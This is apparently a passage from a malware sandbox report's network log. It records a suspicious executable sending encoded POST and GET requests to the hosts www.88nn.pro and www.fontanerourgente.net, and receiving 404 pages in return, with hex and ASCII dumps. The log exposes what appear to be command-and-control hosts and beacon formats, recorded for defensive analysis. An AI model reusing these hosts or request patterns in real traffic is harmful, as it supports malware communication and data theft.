                  Data Raw: 35 36 67 44 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4e 39 68 70 67 4f 50 6e 62 4e 47 56 62 71 33 6d 31 36 56 76 4e 69 39 68 30 6d 39 74 37 75 6b 48 38 7a 55 45 6c 6b 48 34 76 4f 48 31 75 6b 70 49 69 34 54 61 48 4e 43 67 36 53 74 36 6f 4e 70 4e 32 70 57 4b 70 68 5a 56 70 55 30 78 48 5a 66 50 5a 63 77 72 49 78 63 51 41 63 45 42 69 7a 46 4c 54 4a 61 41 48 78 46 35 2f 34 79 4d 45 70 4d 6b 4c 71 43 78 52 6e 2b 74 6a 7a 42 47 7a 4e 62 50 4c 41 74 71 6c 31 31 43 30 56 58 6f 76 68 59 54 37 66 46 37 37 2f 67 63 78 76 46 30 73 32 64 5a 79 59 76 4b 38 37 62 54 63 67 67 77 36 59 3d
                  Data Ascii: 56gD=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29N9hpgOPnbNGVbq3m16VvNi9h0m9t7ukH8zUElkH4vOH1ukpIi4TaHNCg6St6oNpN2pWKphZVpU0xHZfPZcwrIxcQAcEBizFLTJaAHxF5/4yMEpMkLqCxRn+tjzBGzNbPLAtql11C0VXovhYT7fF77/gcxvF0s2dZyYvK87bTcggw6Y=
                  Sep 4, 2024 09:36:05.428503036 CEST302INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:05 GMT
                  Content-Type: text/html
                  Content-Length: 138
                  Connection: close
                  ETag: "667cd175-8a"
                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.44974045.157.69.194805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:07.121974945 CEST10835OUTPOST /l4rw/ HTTP/1.1
                  Host: www.88nn.pro
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.88nn.pro
                  Referer: http://www.88nn.pro/l4rw/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4d 46 68 70 53 57 50 31 6f 6c 47 53 62 71 33 76 56 36 57 76 4e 6a 68 68 77 43 68 74 37 71 72 48 2b 37 55 4c 6e 38 48 76 75 4f 48 38 75 6b 70 42 43 34 51 56 6e 4e 54 67 36 43 78 36 70 39 70 4e 32 70 57 4b 72 35 5a 43 74 49 30 69 58 5a 41 62 4a 63 38 38 59 78 30 51 41 55 36 42 69 6e 56 4c 6a 70 61 41 6d 42 46 36 4a 6b 79 4f 6b 70 4f 6e 4c 71 61 78 52 72 6c 74 6a 66 37 47 7a 34 54 50 4b 34 74 6f 67 63 42 59 6c 74 2f 2b 50 70 72 43 4a 2f 31 31 61 54 4e 52 54 66 4a 33 38 4b 52 4e 68 49 6a 4d 4e 62 4c 58 2b 56 6c 69 2f 5a 76 55 43 45 5a 72 6b 38 69 58 31 68 4d 31 4d 38 47 31 52 37 75 32 47 6a 65 6a 4a 53 56 4a 30 71 48 2f 66 38 7a 78 4c 45 54 64 34 57 51 37 68 6d 4c 33 72 6f 69 73 6c 38 71 69 36 76 4d 68 52 59 4b 66 6a 57 49 79 4d 34 41 79 67 2b 5a 2f 2f 48 6b 32 36 6f 4a 39 78 59 65 67 35 5a 4b 77 30 4f 57 70 4b 58 37 59 2b 36 6e 63 37 2b 37 79 42 2f 45 6a 67 72 75 36 [TRUNCATED]
                  Data Ascii: 56gD=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29MFhpSWP1olGSbq3vV6WvNjhhwCht7qrH+7ULn8HvuOH8ukpBC4QVnNTg6Cx6p9pN2pWKr5ZCtI0iXZAbJc88Yx0QAU6BinVLjpaAmBF6JkyOkpOnLqaxRrltjf7Gz4TPK4togcBYlt/+PprCJ/11aTNRTfJ38KRNhIjMNbLX+Vli/ZvUCEZrk8iX1hM1M8G1R7u2GjejJSVJ0qH/f8zxLETd4WQ7hmL3roisl8qi6vMhRYKfjWIyM4Ayg+Z//Hk26oJ9xYeg5ZKw0OWpKX7Y+6nc7+7yB/Ejgru6qgEMrVSywziwRIliYJGyV25SssQTSr3wv1jr9JySfLZDidr8gDueDcKt9rO+Wwi98XNzIo0fejntyQ+zQMtxBc4xSkhtL/9VInugPVo/qYANhZoXCoEuHg/iss78TuQp6m1bveG8yG1Rtxnbxu3MGK5+jXmWIguuW+Z47pEk5z7dJ4p27EG4wbTAVOHj5/Kj1TxwXTWjHDW8JVGGiE8TvxO54wKnp++opGb3kB81tyMEpB5CPbYyMDuoLVo51SdqYUqr79etNleuybvriVimix5WiUaB1jT5jMsHx/pNb7eO+B5dDgE3lFt8u47WqduySZpEKxLShZXKl/aivY9GPh1DxSNdCJvGgOROCauOyBxrUeK+a2HELAdsW2C+XD/5/jpmgczfd9J8ilscoDvlDmx4c7QRAOqDAMQ0NbiV+MEcMqsLy8ccYvcYnfTCAJkHU//E4ELQc5BMm57yEQILFM3TdPON4HdyLmq1XJS99NONDGB+p4ZA7LJcT55yIfOsia4drNCkFi2olZK/0J83BnDqj+1cYilo347W36FWRRPhnt3LKaYKXEBsBnmUfEVqPT9YoWKiLTemWP5RuzLY8ClCTbESvgWVg5Qt3l/C9qXD+/garr7/GEvnda3Lc6ZLY/c2131Z83DB7TpOT7H/wlRIskcAoZUeeV [TRUNCATED]
                  Sep 4, 2024 09:36:08.229183912 CEST302INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:07 GMT
                  Content-Type: text/html
                  Content-Length: 138
                  Connection: close
                  ETag: "667cd175-8a"
                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.44974145.157.69.194805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:09.679841995 CEST477OUTGET /l4rw/?56gD=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.88nn.pro
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:36:10.532130957 CEST302INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:10 GMT
                  Content-Type: text/html
                  Content-Length: 138
                  Connection: close
                  ETag: "667cd175-8a"
                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.44974237.187.158.211805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:15.596967936 CEST769OUTPOST /t3gh/ HTTP/1.1
                  Host: www.fontanerourgente.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.fontanerourgente.net
                  Referer: http://www.fontanerourgente.net/t3gh/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6d 69 66 6c 69 44 55 77 78 65 54 72 47 70 69 62 78 67 63 58 61 38 6e 65 53 49 35 57 6d 44 6c 54 4d 30 77 50 55 78 67 4a 66 4c 72 69 35 43 74 77 4b 69 30 37 73 4b 7a 4d 6c 39 7a 31 43 55 61 32 62 4a 4a 4b 57 2b 31 6e 70 53 56 33 2b 79 44 6b 34 49 6e 66 74 6d 5a 2f 70 62 78 66 79 4a 72 72 6f 71 62 46 5a 70 65 62 59 36 34 4c 69 4b 71 57 44 54 50 56 4a 73 58 64 52 4e 33 66 42 66 70 79 6c 35 66 42 35 54 36 47 47 39 6b 6b 31 39 6f 74 74 57 4f 6c 75 6e 79 6f 39 7a 44 33 6c 38 46 62 43 4e 67 71 70 6a 5a 6c 42 35 65 39 46 34 51 31 30 7a 52 52 31 77 3d 3d
                  Data Ascii: 56gD=Q9wnYURzxwjnmifliDUwxeTrGpibxgcXa8neSI5WmDlTM0wPUxgJfLri5CtwKi07sKzMl9z1CUa2bJJKW+1npSV3+yDk4InftmZ/pbxfyJrroqbFZpebY64LiKqWDTPVJsXdRN3fBfpyl5fB5T6GG9kk19ottWOlunyo9zD3l8FbCNgqpjZlB5e9F4Q10zRR1w==
                  Sep 4, 2024 09:36:16.473136902 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:36:16 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                  Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                  Sep 4, 2024 09:36:16.473155022 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                  Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                  Sep 4, 2024 09:36:16.473165989 CEST1236INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                  Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                  Sep 4, 2024 09:36:16.473310947 CEST672INData Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                  Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                  Sep 4, 2024 09:36:16.473321915 CEST1236INData Raw: 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: t;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://mgmasistencia.com/wp-includes/css/dist/blo
                  Sep 4, 2024 09:36:16.473332882 CEST1236INData Raw: 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65
                  Data Ascii: ullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote c
                  Sep 4, 2024 09:36:16.473345041 CEST1236INData Raw: 67 68 74 3a 32 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d
                  Data Ascii: ght:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}.wp
                  Sep 4, 2024 09:36:16.473356962 CEST1236INData Raw: 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 46 46 46 46 46 46 3b 2d 2d 77 70 2d 2d
                  Data Ascii: reset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #FFFFFF;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid
                  Sep 4, 2024 09:36:16.473372936 CEST1236INData Raw: 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72
                  Data Ascii: dient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradien
                  Sep 4, 2024 09:36:16.473388910 CEST1236INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 67 72 65 65 6e 2d 74 6f 2d 79 65 6c 6c 6f 77 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 44 31 45 34 44 44 20 30 25 2c 20 23 45 45 45 41
                  Data Ascii: --wp--preset--gradient--green-to-yellow: linear-gradient(160deg, #D1E4DD 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-green: linear-gradient(160deg, #EEEADD 0%, #D1E4DD 100%);--wp--preset--gradient--red-to-yellow: linear-gradient(160deg
                  Sep 4, 2024 09:36:16.478178024 CEST1236INData Raw: 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77
                  Data Ascii: rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.44974337.187.158.211805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:18.200577974 CEST789OUTPOST /t3gh/ HTTP/1.1
                  Host: www.fontanerourgente.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.fontanerourgente.net
                  Referer: http://www.fontanerourgente.net/t3gh/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6e 47 6a 6c 6b 67 38 77 30 2b 54 6f 4c 35 69 62 6f 51 63 54 61 38 6a 65 53 4a 39 67 6d 78 42 54 4d 52 55 50 62 54 45 4a 65 4c 72 69 33 69 74 78 58 79 30 73 73 4b 2f 75 6c 2f 33 31 43 55 65 32 62 4c 52 4b 52 4a 70 6f 72 43 56 31 79 53 44 71 37 34 6e 66 74 6d 5a 2f 70 62 6c 78 79 4a 6a 72 76 61 72 46 59 4c 32 63 57 61 34 49 6c 4b 71 57 48 54 50 52 4a 73 58 30 52 4a 58 35 42 5a 6c 79 6c 35 50 42 35 6e 4f 46 4e 39 6b 59 37 64 70 63 6b 47 7a 64 72 30 66 6c 38 6c 4c 73 76 38 42 64 4f 72 78 77 34 53 34 79 54 35 36 4f 59 2f 5a 42 35 77 73 59 75 2b 4a 41 65 45 55 78 36 4b 7a 6a 79 73 71 58 71 70 66 52 47 74 51 3d
                  Data Ascii: 56gD=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxBTMRUPbTEJeLri3itxXy0ssK/ul/31CUe2bLRKRJporCV1ySDq74nftmZ/pblxyJjrvarFYL2cWa4IlKqWHTPRJsX0RJX5BZlyl5PB5nOFN9kY7dpckGzdr0fl8lLsv8BdOrxw4S4yT56OY/ZB5wsYu+JAeEUx6KzjysqXqpfRGtQ=
                  Sep 4, 2024 09:36:19.092109919 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:36:18 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                  Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                  Sep 4, 2024 09:36:19.092123032 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                  Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                  Sep 4, 2024 09:36:19.092133999 CEST1236INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                  Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
